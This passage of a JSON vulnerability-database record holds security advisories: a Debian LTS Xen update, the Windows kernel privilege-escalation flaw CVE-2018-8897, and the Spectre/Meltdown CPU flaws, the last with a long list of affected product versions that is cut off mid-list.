been discovered in the Xen hypervisor, which\ncould result in denial of service, informations leaks or privilege\nescalation.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n4.4.4lts4-0+deb8u1.\n\nWe recommend that you upgrade your xen packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 8, "modified": "2018-11-12T13:09:59", "published": "2018-11-12T13:09:59", "id": "DEBIAN:DLA-1577-1:71995", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201811/msg00013.html", "title": "[SECURITY] [DLA 1577-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-05-08T23:57:19", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "SMNTC-104071", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/104071", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2018-8897 Local Privilege Escalation Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-11T18:48:46", "bulletinFamily": "software", "cvelist": ["CVE-2017-5753", "CVE-2017-5754", "CVE-2017-5715"], "description": "### Description\n\nMultiple CPU Hardware are prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Apple Mac Os X 10.11.6 \n * Apple iOS 11.2 \n * Apple macOS 10.12.6 \n * Apple macOS 10.13.2 \n * Apple tvOS 11.2 \n * BD Accuri C6 Plus \n * BD Assurity Linc \n * BD BACTEC 9120/9240 \n * BD BACTEC FX \n * BD BACTEC FX40 \n * BD Data Innovations \n * BD EpiCenter \n * BD FACSAria Fusion \n * BD FACSAria I/II/III \n * BD FACSCalibur \n * BD FACSCanto 10-color \n * BD FACSCanto 10-color clinical \n * BD FACSCanto II \n * BD FACSCanto II clinical \n * BD FACSCelesta \n * BD FACSCount \n * BD FACSDuet Sample Prep (ASaP) \n * BD FACSJazz \n * BD FACSLink Interface \n * BD FACSLyric \n * BD FACSMelody \n * BD FACSSample Prep Assistant III \n * BD FACSVerse \n * BD FACSVia \n * BD GenCell CliC \n * BD Influx \n * BD Kiestra TLA/WCA \n * BD LSR II \n * BD LSRFortessa \n * BD LSRFortessa X-20 \n * BD Lyse Wash Assistant \n * BD MAX \n * BD Panel Designer \n * BD Phoenix 100 \n * BD Phoenix M50 \n * BD Pyxis Anesthesia ES \n * BD Pyxis Anesthesia System 3500 \n * BD Pyxis CIISafe -Workstation \n * BD Pyxis CUBIE Replenishment Station \n * BD Pyxis CathRack \n * BD Pyxis DuoStation \n * BD Pyxis EcoStation System \n * BD Pyxis Infant Care Verification \n * BD Pyxis MedStation 3500 \n * BD Pyxis MedStation 4000 \n * BD Pyxis MedStation ES \n * BD Pyxis Medication Administration \n * BD Pyxis Nursing Data Collection \n * BD Pyxis ParAssist System \n * BD Pyxis Parx \n * BD Pyxis Parx handheld \n * BD Pyxis ProcedureStation \n * BD Pyxis ScrubStation System \n * BD Pyxis Specimen Collection Verification \n * BD Pyxis StockStation System \n * BD Pyxis Supply Roller \n * BD Pyxis SupplyStation \n * BD Pyxis Transfusion Verification \n * BD Rowa Dose \n * BD Rowa Smart \n * BD Rowa Vmax System \n * BD Totalys SlidePrep \n * BD Viper LT \n * BD Viper XTR \n * Bluecoat Content Analysis 2.1 \n * Bluecoat Content Analysis 2.2 \n * Bluecoat Malware Analysis Appliance 4.2 \n * Bluecoat Security Analytics 7.1 \n * Bluecoat Security Analytics 7.2 \n * Bluecoat Security Analytics 7.3 \n * Bluecoat X-Series XOS 10.0 \n * Bluecoat X-Series XOS 11.0 \n * Bluecoat X-Series XOS 9.7 \n * Cisco Carrier Routing System 6.6.0.BASE \n * Cisco Unified Computing System 2.2 \n * Cisco Unified Computing System 3.1 \n * Cisco Unified Computing System 3.2 \n * Google Android \n * Google Chrome 0.1.38.1 \n * Google Chrome 0.1.38.2 \n * Google Chrome 0.1.38.4 \n * Google Chrome 0.1.40.1 \n * Google Chrome 0.1.42.2 \n * Google Chrome 0.1.42.3 \n * Google Chrome 0.2.149.27 \n * Google Chrome 0.2.149.29 \n * Google Chrome 0.2.149.30 \n * Google Chrome 0.2.152.1 \n * Google Chrome 0.2.153.1 \n * Google Chrome 0.3.154 9 \n * Google Chrome 0.3.154.0 \n * Google Chrome 0.3.154.3 \n * Google Chrome 0.4.154.18 \n * Google Chrome 0.4.154.22 \n * Google Chrome 0.4.154.31 \n * Google Chrome 0.4.154.33 \n * Google Chrome 1.0.154.36 \n * Google Chrome 1.0.154.39 \n * Google Chrome 1.0.154.42 \n * Google Chrome 1.0.154.43 \n * Google Chrome 1.0.154.46 \n * Google Chrome 1.0.154.48 \n * Google Chrome 1.0.154.52 \n * Google Chrome 1.0.154.53 \n * Google Chrome 1.0.154.55 \n * Google Chrome 1.0.154.59 \n * Google Chrome 1.0.154.61 \n * Google Chrome 1.0.154.64 \n * Google Chrome 1.0.154.65 \n * Google Chrome 10 \n * Google Chrome 10.0.601.0 \n * Google Chrome 10.0.602.0 \n * Google Chrome 10.0.603.0 \n * Google Chrome 10.0.603.2 \n * Google Chrome 10.0.603.3 \n * Google Chrome 10.0.604.0 \n * Google Chrome 10.0.605.0 \n * Google Chrome 10.0.606.0 \n * Google Chrome 10.0.607.0 \n * Google Chrome 10.0.608.0 \n * Google Chrome 10.0.609.0 \n * Google Chrome 10.0.610.0 \n * Google Chrome 10.0.611.0 \n * Google Chrome 10.0.611.1 \n * Google Chrome 10.0.612.0 \n * Google Chrome 10.0.612.1 \n * Google Chrome 10.0.612.2 \n * Google Chrome 10.0.612.3 \n * Google Chrome 10.0.613.0 \n * Google Chrome 10.0.614.0 \n * Google Chrome 10.0.615.0 \n * Google Chrome 10.0.616.0 \n * Google Chrome 10.0.617.0 \n * Google Chrome 10.0.618.0 \n * Google Chrome 10.0.619.0 \n * Google Chrome 10.0.620.0 \n * Google Chrome 10.0.621.0 \n * Google Chrome 10.0.622.0 \n * Google Chrome 10.0.622.1 \n * Google Chrome 10.0.623.0 \n * Google Chrome 10.0.624.0 \n * Google Chrome 10.0.625.0 \n * Google Chrome 10.0.626.0 \n * Google Chrome 10.0.627.0 \n * Google Chrome 10.0.628.0 \n * Google Chrome 10.0.629.0 \n * Google Chrome 10.0.630.0 \n * Google Chrome 10.0.631.0 \n * Google Chrome 10.0.632.0 \n * Google Chrome 10.0.633.0 \n * Google Chrome 10.0.634.0 \n * Google Chrome 10.0.634.1 \n * Google Chrome 10.0.635.0 \n * Google Chrome 10.0.636.0 \n * Google Chrome 10.0.638.0 \n * Google Chrome 10.0.638.1 \n * Google Chrome 10.0.639.0 \n * Google Chrome 10.0.640.0 \n * Google Chrome 10.0.642.0 \n * Google Chrome 10.0.642.1 \n * Google Chrome 10.0.642.2 \n * Google Chrome 10.0.643.0 \n * Google Chrome 10.0.644.0 \n * Google Chrome 10.0.645.0 \n * Google Chrome 10.0.646.0 \n * Google Chrome 10.0.647.0 \n * Google Chrome 10.0.648.0 \n * Google Chrome 10.0.648.1 \n * Google Chrome 10.0.648.10 \n * Google Chrome 10.0.648.101 \n * Google Chrome 10.0.648.103 \n * Google Chrome 10.0.648.105 \n * Google Chrome 10.0.648.107 \n * Google Chrome 10.0.648.11 \n * Google Chrome 10.0.648.114 \n * Google Chrome 10.0.648.116 \n * Google Chrome 10.0.648.118 \n * Google Chrome 10.0.648.119 \n * Google Chrome 10.0.648.12 \n * Google Chrome 10.0.648.120 \n * Google Chrome 10.0.648.121 \n * Google Chrome 10.0.648.122 \n * Google Chrome 10.0.648.123 \n * Google Chrome 10.0.648.124 \n * Google Chrome 10.0.648.125 \n * Google Chrome 10.0.648.126 \n * Google Chrome 10.0.648.127 \n * Google Chrome 10.0.648.128 \n * Google Chrome 10.0.648.129 \n * Google Chrome 10.0.648.13 \n * Google Chrome 10.0.648.130 \n * Google Chrome 10.0.648.131 \n * Google Chrome 10.0.648.132 \n * Google Chrome 10.0.648.133 \n * Google Chrome 10.0.648.134 \n * Google Chrome 10.0.648.135 \n * Google Chrome 10.0.648.151 \n * Google Chrome 10.0.648.18 \n * Google Chrome 10.0.648.2 \n * Google Chrome 10.0.648.201 \n * Google Chrome 10.0.648.203 \n * Google Chrome 10.0.648.204 \n * Google Chrome 10.0.648.205 \n * Google Chrome 10.0.648.23 \n * Google Chrome 10.0.648.26 \n * Google Chrome 10.0.648.28 \n * Google Chrome 10.0.648.3 \n * Google Chrome 10.0.648.32 \n * Google Chrome 10.0.648.35 \n * Google Chrome 10.0.648.38 \n * Google Chrome 10.0.648.4 \n * Google Chrome 10.0.648.42 \n * Google Chrome 10.0.648.45 \n * Google Chrome 10.0.648.49 \n * Google Chrome 10.0.648.5 \n * Google Chrome 10.0.648.54 \n * Google Chrome 10.0.648.56 \n * Google Chrome 10.0.648.59 \n * Google Chrome 10.0.648.6 \n * Google Chrome 10.0.648.62 \n * Google Chrome 10.0.648.66 \n * Google Chrome 10.0.648.68 \n * Google Chrome 10.0.648.7 \n * Google Chrome 10.0.648.70 \n * Google Chrome 10.0.648.72 \n * Google Chrome 10.0.648.76 \n * Google Chrome 10.0.648.79 \n * Google Chrome 10.0.648.8 \n * Google Chrome 10.0.648.82 \n * Google Chrome 10.0.648.84 \n * Google Chrome 10.0.648.87 \n * Google Chrome 10.0.648.9 \n * Google Chrome 10.0.648.90 \n * Google Chrome 10.0.649.0 \n * Google Chrome 10.0.650.0 \n * Google Chrome 10.0.651.0 \n * Google Chrome 11 \n * Google Chrome 11.0.652.0 \n * Google Chrome 11.0.653.0 \n * Google Chrome 11.0.654.0 \n * Google Chrome 11.0.655.0 \n * Google Chrome 11.0.656.0 \n * Google Chrome 11.0.657.0 \n * Google Chrome 11.0.658.0 \n * Google Chrome 11.0.658.1 \n * Google Chrome 11.0.659.0 \n * Google Chrome 11.0.660.0 \n * Google Chrome 11.0.661.0 \n * Google Chrome 11.0.662.0 \n * Google Chrome 11.0.663.0 \n * Google Chrome 11.0.664.1 \n * Google Chrome 11.0.665.0 \n * Google Chrome 11.0.666.0 \n * Google Chrome 11.0.667.0 \n * Google Chrome 11.0.667.2 \n * Google Chrome 11.0.667.3 \n * Google Chrome 11.0.667.4 \n * Google Chrome 11.0.668.0 \n * Google Chrome 11.0.669.0 \n * Google Chrome 11.0.670.0 \n * Google Chrome 11.0.671.0 \n * Google Chrome 11.0.672.0 \n * Google Chrome 11.0.672.1 \n * Google Chrome 11.0.672.2 \n * Google Chrome 11.0.673.0 \n * Google Chrome 11.0.674.0 \n * Google Chrome 11.0.675.0 \n * Google Chrome 11.0.676.0 \n * Google Chrome 11.0.677.0 \n * Google Chrome 11.0.678.0 \n * Google Chrome 11.0.679.0 \n * Google Chrome 11.0.680.0 \n * Google Chrome 11.0.681.0 \n * Google Chrome 11.0.682.0 \n * Google Chrome 11.0.683.0 \n * Google Chrome 11.0.684.0 \n * Google Chrome 11.0.685.0 \n * Google Chrome 11.0.686.0 \n * Google Chrome 11.0.686.1 \n * Google Chrome 11.0.686.2 \n * Google Chrome 11.0.686.3 \n * Google Chrome 11.0.687.0 \n * Google Chrome 11.0.687.1 \n * Google Chrome 11.0.688.0 \n * Google Chrome 11.0.689.0 \n * Google Chrome 11.0.690.0 \n * Google Chrome 11.0.690.1 \n * Google Chrome 11.0.691.0 \n * Google Chrome 11.0.692.0 \n * Google Chrome 11.0.693.0 \n * Google Chrome 11.0.694.0 \n * Google Chrome 11.0.695.0 \n * Google Chrome 11.0.696.0 \n * Google Chrome 11.0.696.1 \n * Google Chrome 11.0.696.10 \n * Google Chrome 11.0.696.11 \n * Google Chrome 11.0.696.12 \n * Google Chrome 11.0.696.13 \n * Google Chrome 11.0.696.14 \n * Google Chrome 11.0.696.15 \n * Google Chrome 11.0.696.16 \n * Google Chrome 11.0.696.17 \n * Google Chrome 11.0.696.18 \n * Google Chrome 11.0.696.19 \n * Google Chrome 11.0.696.2 \n * Google Chrome 11.0.696.20 \n * Google Chrome 11.0.696.21 \n * Google Chrome 11.0.696.22 \n * Google Chrome 11.0.696.23 \n * Google Chrome 11.0.696.24 \n * Google Chrome 11.0.696.25 \n * Google Chrome 11.0.696.26 \n * Google Chrome 11.0.696.27 \n * Google Chrome 11.0.696.28 \n * Google Chrome 11.0.696.29 \n * Google Chrome 11.0.696.3 \n * Google Chrome 11.0.696.30 \n * Google Chrome 11.0.696.31 \n * Google Chrome 11.0.696.32 \n * Google Chrome 11.0.696.33 \n * Google Chrome 11.0.696.34 \n * Google Chrome 11.0.696.35 \n * Google Chrome 11.0.696.36 \n * Google Chrome 11.0.696.37 \n * Google Chrome 11.0.696.38 \n * Google Chrome 11.0.696.39 \n * Google Chrome 11.0.696.4 \n * Google Chrome 11.0.696.40 \n * Google Chrome 11.0.696.41 \n * Google Chrome 11.0.696.42 \n * Google Chrome 11.0.696.43 \n * Google Chrome 11.0.696.44 \n * Google Chrome 11.0.696.45 \n * Google Chrome 11.0.696.46 \n * Google Chrome 11.0.696.47 \n * Google Chrome 11.0.696.48 \n * Google Chrome 11.0.696.49 \n * Google Chrome 11.0.696.5 \n * Google Chrome 11.0.696.50 \n * Google Chrome 11.0.696.51 \n * Google Chrome 11.0.696.52 \n * Google Chrome 11.0.696.53 \n * Google Chrome 11.0.696.54 \n * Google Chrome 11.0.696.55 \n * Google Chrome 11.0.696.56 \n * Google Chrome 11.0.696.57 \n * Google Chrome 11.0.696.58 \n * Google Chrome 11.0.696.59 \n * Google Chrome 11.0.696.60 \n * Google Chrome 11.0.696.61 \n * Google Chrome 11.0.696.62 \n * Google Chrome 11.0.696.63 \n * Google Chrome 11.0.696.64 \n * Google Chrome 11.0.696.65 \n * Google Chrome 11.0.696.66 \n * Google Chrome 11.0.696.67 \n * Google Chrome 11.0.696.68 \n * Google Chrome 11.0.696.69 \n * Google Chrome 11.0.696.7 \n * Google Chrome 11.0.696.70 \n * Google Chrome 11.0.696.71 \n * Google Chrome 11.0.696.72 \n * Google Chrome 11.0.696.77 \n * Google Chrome 11.0.696.8 \n * Google Chrome 11.0.696.9 \n * Google Chrome 11.0.697.0 \n * Google Chrome 11.0.698.0 \n * Google Chrome 11.0.699.0 \n * Google Chrome 12 \n * Google Chrome 12.0.700.0 \n * Google Chrome 12.0.701.0 \n * Google Chrome 12.0.702.0 \n * Google Chrome 12.0.702.1 \n * Google Chrome 12.0.702.2 \n * Google Chrome 12.0.703.0 \n * Google Chrome 12.0.704.0 \n * Google Chrome 12.0.705.0 \n * Google Chrome 12.0.706.0 \n * Google Chrome 12.0.707.0 \n * Google Chrome 12.0.708.0 \n * Google Chrome 12.0.709.0 \n * Google Chrome 12.0.710.0 \n * Google Chrome 12.0.711.0 \n * Google Chrome 12.0.712.0 \n * Google Chrome 12.0.713.0 \n * Google Chrome 12.0.714.0 \n * Google Chrome 12.0.715.0 \n * Google Chrome 12.0.716.0 \n * Google Chrome 12.0.717.0 \n * Google Chrome 12.0.718.0 \n * Google Chrome 12.0.719.0 \n * Google Chrome 12.0.719.1 \n * Google Chrome 12.0.720.0 \n * Google Chrome 12.0.721.0 \n * Google Chrome 12.0.721.1 \n * Google Chrome 12.0.722.0 \n * Google Chrome 12.0.723.0 \n * Google Chrome 12.0.723.1 \n * Google Chrome 12.0.724.0 \n * Google Chrome 12.0.725.0 \n * Google Chrome 12.0.726.0 \n * Google Chrome 12.0.727.0 \n * Google Chrome 12.0.728.0 \n * Google Chrome 12.0.729.0 \n * Google Chrome 12.0.730.0 \n * Google Chrome 12.0.731.0 \n * Google Chrome 12.0.732.0 \n * Google Chrome 12.0.733.0 \n * Google Chrome 12.0.734.0 \n * Google Chrome 12.0.735.0 \n * Google Chrome 12.0.736.0 \n * Google Chrome 12.0.737.0 \n * Google Chrome 12.0.738.0 \n * Google Chrome 12.0.739.0 \n * Google Chrome 12.0.740.0 \n * Google Chrome 12.0.741.0 \n * Google Chrome 12.0.742.0 \n * Google Chrome 12.0.742.1 \n * Google Chrome 12.0.742.10 \n * Google Chrome 12.0.742.100 \n * Google Chrome 12.0.742.105 \n * Google Chrome 12.0.742.11 \n * Google Chrome 12.0.742.111 \n * Google Chrome 12.0.742.112 \n * Google Chrome 12.0.742.113 \n * Google Chrome 12.0.742.114 \n * Google Chrome 12.0.742.115 \n * Google Chrome 12.0.742.12 \n * Google Chrome 12.0.742.120 \n * Google Chrome 12.0.742.121 \n * Google Chrome 12.0.742.122 \n * Google Chrome 12.0.742.123 \n * Google Chrome 12.0.742.124 \n * Google Chrome 12.0.742.13 \n * Google Chrome 12.0.742.14 \n * Google Chrome 12.0.742.15 \n * Google Chrome 12.0.742.16 \n * Google Chrome 12.0.742.17 \n * Google Chrome 12.0.742.18 \n * Google Chrome 12.0.742.19 \n * Google Chrome 12.0.742.2 \n * Google Chrome 12.0.742.20 \n * Google Chrome 12.0.742.21 \n * Google Chrome 12.0.742.22 \n * Google Chrome 12.0.742.3 \n * Google Chrome 12.0.742.30 \n * Google Chrome 12.0.742.4 \n * Google Chrome 12.0.742.41 \n * Google Chrome 12.0.742.42 \n * Google Chrome 12.0.742.43 \n * Google Chrome 12.0.742.44 \n * Google Chrome 12.0.742.45 \n * Google Chrome 12.0.742.46 \n * Google Chrome 12.0.742.47 \n * Google Chrome 12.0.742.48 \n * Google Chrome 12.0.742.49 \n * Google Chrome 12.0.742.5 \n * Google Chrome 12.0.742.50 \n * Google Chrome 12.0.742.51 \n * Google Chrome 12.0.742.52 \n * Google Chrome 12.0.742.53 \n * Google Chrome 12.0.742.54 \n * Google Chrome 12.0.742.55 \n * Google Chrome 12.0.742.56 \n * Google Chrome 12.0.742.57 \n * Google Chrome 12.0.742.58 \n * Google Chrome 12.0.742.59 \n * Google Chrome 12.0.742.6 \n * Google Chrome 12.0.742.60 \n * Google Chrome 12.0.742.61 \n * Google Chrome 12.0.742.63 \n * Google Chrome 12.0.742.64 \n * Google Chrome 12.0.742.65 \n * Google Chrome 12.0.742.66 \n * Google Chrome 12.0.742.67 \n * Google Chrome 12.0.742.68 \n * Google Chrome 12.0.742.69 \n * Google Chrome 12.0.742.70 \n * Google Chrome 12.0.742.71 \n * Google Chrome 12.0.742.72 \n * Google Chrome 12.0.742.73 \n * Google Chrome 12.0.742.74 \n * Google Chrome 12.0.742.75 \n * Google Chrome 12.0.742.77 \n * Google Chrome 12.0.742.8 \n * Google Chrome 12.0.742.82 \n * Google Chrome 12.0.742.9 \n * Google Chrome 12.0.742.91 \n * Google Chrome 12.0.742.92 \n * Google Chrome 12.0.742.93 \n * Google Chrome 12.0.742.94 \n * Google Chrome 12.0.743.0 \n * Google Chrome 12.0.744.0 \n * Google Chrome 12.0.745.0 \n * Google Chrome 12.0.746.0 \n * Google Chrome 12.0.747.0 \n * Google Chrome 13 \n * Google Chrome 13.0.748.0 \n * Google Chrome 13.0.749.0 \n * Google Chrome 13.0.750.0 \n * Google Chrome 13.0.751.0 \n * Google Chrome 13.0.752.0 \n * Google Chrome 13.0.753.0 \n * Google Chrome 13.0.754.0 \n * Google Chrome 13.0.755.0 \n * Google Chrome 13.0.756.0 \n * Google Chrome 13.0.757.0 \n * Google Chrome 13.0.758.0 \n * Google Chrome 13.0.759.0 \n * Google Chrome 13.0.760.0 \n * Google Chrome 13.0.761.0 \n * Google Chrome 13.0.761.1 \n * Google Chrome 13.0.762.0 \n * Google Chrome 13.0.762.1 \n * Google Chrome 13.0.763.0 \n * Google Chrome 13.0.764.0 \n * Google Chrome 13.0.765.0 \n * Google Chrome 13.0.766.0 \n * Google Chrome 13.0.767.0 \n * Google Chrome 13.0.767.1 \n * Google Chrome 13.0.768.0 \n * Google Chrome 13.0.769.0 \n * Google Chrome 13.0.770.0 \n * Google Chrome 13.0.771.0 \n * Google Chrome 13.0.772.0 \n * Google Chrome 13.0.773.0 \n * Google Chrome 13.0.774.0 \n * Google Chrome 13.0.775.0 \n * Google Chrome 13.0.775.1 \n * Google Chrome 13.0.775.2 \n * Google Chrome 13.0.775.4 \n * Google Chrome 13.0.776.0 \n * Google Chrome 13.0.776.1 \n * Google Chrome 13.0.777.0 \n * Google Chrome 13.0.777.1 \n * Google Chrome 13.0.777.2 \n * Google Chrome 13.0.777.3 \n * Google Chrome 13.0.777.4 \n * Google Chrome 13.0.777.5 \n * Google Chrome 13.0.777.6 \n * Google Chrome 13.0.778.0 \n * Google Chrome 13.0.779.0 \n * Google Chrome 13.0.780.0 \n * Google Chrome 13.0.781.0 \n * Google Chrome 13.0.782.0 \n * Google Chrome 13.0.782.1 \n * Google Chrome 13.0.782.10 \n * Google Chrome 13.0.782.100 \n * Google Chrome 13.0.782.101 \n * Google Chrome 13.0.782.102 \n * Google Chrome 13.0.782.103 \n * Google Chrome 13.0.782.104 \n * Google Chrome 13.0.782.105 \n * Google Chrome 13.0.782.106 \n * Google Chrome 13.0.782.107 \n * Google Chrome 13.0.782.108 \n * Google Chrome 13.0.782.109 \n * Google Chrome 13.0.782.11 \n * Google Chrome 13.0.782.112 \n * Google Chrome 13.0.782.12 \n * Google Chrome 13.0.782.13 \n * Google Chrome 13.0.782.14 \n * Google Chrome 13.0.782.15 \n * Google Chrome 13.0.782.16 \n * Google Chrome 13.0.782.17 \n * Google Chrome 13.0.782.18 \n * Google Chrome 13.0.782.19 \n * Google Chrome 13.0.782.20 \n * Google Chrome 13.0.782.21 \n * Google Chrome 13.0.782.210 \n * Google Chrome 13.0.782.211 \n * Google Chrome 13.0.782.212 \n * Google Chrome 13.0.782.213 \n * Google Chrome 13.0.782.214 \n * Google Chrome 13.0.782.215 \n * Google Chrome 13.0.782.216 \n * Google Chrome 13.0.782.217 \n * Google Chrome 13.0.782.218 \n * Google Chrome 13.0.782.219 \n * Google Chrome 13.0.782.220 \n * Google Chrome 13.0.782.23 \n * Google Chrome 13.0.782.237 \n * Google Chrome 13.0.782.238 \n * Google Chrome 13.0.782.24 \n * Google Chrome 13.0.782.25 \n * Google Chrome 13.0.782.26 \n * Google Chrome 13.0.782.27 \n * Google Chrome 13.0.782.28 \n * Google Chrome 13.0.782.29 \n * Google Chrome 13.0.782.3 \n * Google Chrome 13.0.782.30 \n * Google Chrome 13.0.782.31 \n * Google Chrome 13.0.782.32 \n * Google Chrome 13.0.782.33 \n * Google Chrome 13.0.782.34 \n * Google Chrome 13.0.782.35 \n * Google Chrome 13.0.782.36 \n * Google Chrome 13.0.782.37 \n * Google Chrome 13.0.782.38 \n * Google Chrome 13.0.782.39 \n * Google Chrome 13.0.782.4 \n * Google Chrome 13.0.782.40 \n * Google Chrome 13.0.782.41 \n * Google Chrome 13.0.782.42 \n * Google Chrome 13.0.782.43 \n * Google Chrome 13.0.782.44 \n * Google Chrome 13.0.782.45 \n * Google Chrome 13.0.782.46 \n * Google Chrome 13.0.782.47 \n * Google Chrome 13.0.782.48 \n * Google Chrome 13.0.782.49 \n * Google Chrome 13.0.782.50 \n * Google Chrome 13.0.782.51 \n * Google Chrome 13.0.782.52 \n * Google Chrome 13.0.782.53 \n * Google Chrome 13.0.782.55 \n * Google Chrome 13.0.782.56 \n * Google Chrome 13.0.782.6 \n * Google Chrome 13.0.782.7 \n * Google Chrome 13.0.782.81 \n * Google Chrome 13.0.782.82 \n * Google Chrome 13.0.782.83 \n * Google Chrome 13.0.782.84 \n * Google Chrome 13.0.782.85 \n * Google Chrome 13.0.782.86 \n * Google Chrome 13.0.782.87 \n * Google Chrome 13.0.782.88 \n * Google Chrome 13.0.782.89 \n * Google Chrome 13.0.782.90 \n * Google Chrome 13.0.782.91 \n * Google Chrome 13.0.782.92 \n * Google Chrome 13.0.782.93 \n * Google Chrome 13.0.782.94 \n * Google Chrome 13.0.782.95 \n * Google Chrome 13.0.782.96 \n * Google Chrome 13.0.782.97 \n * Google Chrome 13.0.782.98 \n * Google Chrome 13.0.782.99 \n * Google Chrome 14 \n * Google Chrome 14.0.783.0 \n * Google Chrome 14.0.784.0 \n * Google Chrome 14.0.785.0 \n * Google Chrome 14.0.786.0 \n * Google Chrome 14.0.787.0 \n * Google Chrome 14.0.788.0 \n * Google Chrome 14.0.789.0 \n * Google Chrome 14.0.790.0 \n * Google Chrome 14.0.791.0 \n * Google Chrome 14.0.792.0 \n * Google Chrome 14.0.793.0 \n * Google Chrome 14.0.794.0 \n * Google Chrome 14.0.795.0 \n * Google Chrome 14.0.796.0 \n * Google Chrome 14.0.797.0 \n * Google Chrome 14.0.798.0 \n * Google Chrome 14.0.799.0 \n * Google Chrome 14.0.800.0 \n * Google Chrome 14.0.801.0 \n * Google Chrome 14.0.802.0 \n * Google Chrome 14.0.803.0 \n * Google Chrome 14.0.804.0 \n * Google Chrome 14.0.805.0 \n * Google Chrome 14.0.806.0 \n * Google Chrome 14.0.807.0 \n * Google Chrome 14.0.808.0 \n * Google Chrome 14.0.809.0 \n * Google Chrome 14.0.810.0 \n * Google Chrome 14.0.811.0 \n * Google Chrome 14.0.812.0 \n * Google Chrome 14.0.813.0 \n * Google Chrome 14.0.814.0 \n * Google Chrome 14.0.815.0 \n * Google Chrome 14.0.816.0 \n * Google Chrome 14.0.818.0 \n * Google Chrome 14.0.819.0 \n * Google Chrome 14.0.820.0 \n * Google Chrome 14.0.821.0 \n * Google Chrome 14.0.822.0 \n * Google Chrome 14.0.823.0 \n * Google Chrome 14.0.824.0 \n * Google Chrome 14.0.825.0 \n * Google Chrome 14.0.826.0 \n * Google Chrome 14.0.827.0 \n * Google Chrome 14.0.827.10 \n * Google Chrome 14.0.827.12 \n * Google Chrome 14.0.829.1 \n * Google Chrome 14.0.830.0 \n * Google Chrome 14.0.831.0 \n * Google Chrome 14.0.832.0 \n * Google Chrome 14.0.833.0 \n * Google Chrome 14.0.834.0 \n * Google Chrome 14.0.835.0 \n * Google Chrome 14.0.835.1 \n * Google Chrome 14.0.835.100 \n * Google Chrome 14.0.835.101 \n * Google Chrome 14.0.835.102 \n * Google Chrome 14.0.835.103 \n * Google Chrome 14.0.835.104 \n * Google Chrome 14.0.835.105 \n * Google Chrome 14.0.835.106 \n * Google Chrome 14.0.835.107 \n * Google Chrome 14.0.835.108 \n * Google Chrome 14.0.835.109 \n * Google Chrome 14.0.835.11 \n * Google Chrome 14.0.835.110 \n * Google Chrome 14.0.835.111 \n * Google Chrome 14.0.835.112 \n * Google Chrome 14.0.835.113 \n * Google Chrome 14.0.835.114 \n * Google Chrome 14.0.835.115 \n * Google Chrome 14.0.835.116 \n * Google Chrome 14.0.835.117 \n * Google Chrome 14.0.835.118 \n * Google Chrome 14.0.835.119 \n * Google Chrome 14.0.835.120 \n * Google Chrome 14.0.835.121 \n * Google Chrome 14.0.835.122 \n * Google Chrome 14.0.835.123 \n * Google Chrome 14.0.835.124 \n * Google Chrome 14.0.835.125 \n * Google Chrome 14.0.835.126 \n * Google Chrome 14.0.835.127 \n * Google Chrome 14.0.835.128 \n * Google Chrome 14.0.835.13 \n * Google Chrome 14.0.835.14 \n * Google Chrome 14.0.835.149 \n * Google Chrome 14.0.835.15 \n * Google Chrome 14.0.835.150 \n * Google Chrome 14.0.835.151 \n * Google Chrome 14.0.835.152 \n * Google Chrome 14.0.835.153 \n * Google Chrome 14.0.835.154 \n * Google Chrome 14.0.835.155 \n * Google Chrome 14.0.835.156 \n * Google Chrome 14.0.835.157 \n * Google Chrome 14.0.835.158 \n * Google Chrome 14.0.835.159 \n * Google Chrome 14.0.835.16 \n * Google Chrome 14.0.835.160 \n * Google Chrome 14.0.835.161 \n * Google Chrome 14.0.835.162 \n * Google Chrome 14.0.835.163 \n * Google Chrome 14.0.835.18 \n * Google Chrome 14.0.835.184 \n * Google Chrome 14.0.835.186 \n * Google Chrome 14.0.835.187 \n * Google Chrome 14.0.835.2 \n * Google Chrome 14.0.835.20 \n * Google Chrome 14.0.835.202 \n * Google Chrome 14.0.835.203 \n * Google Chrome 14.0.835.204 \n * Google Chrome 14.0.835.21 \n * Google Chrome 14.0.835.22 \n * Google Chrome 14.0.835.23 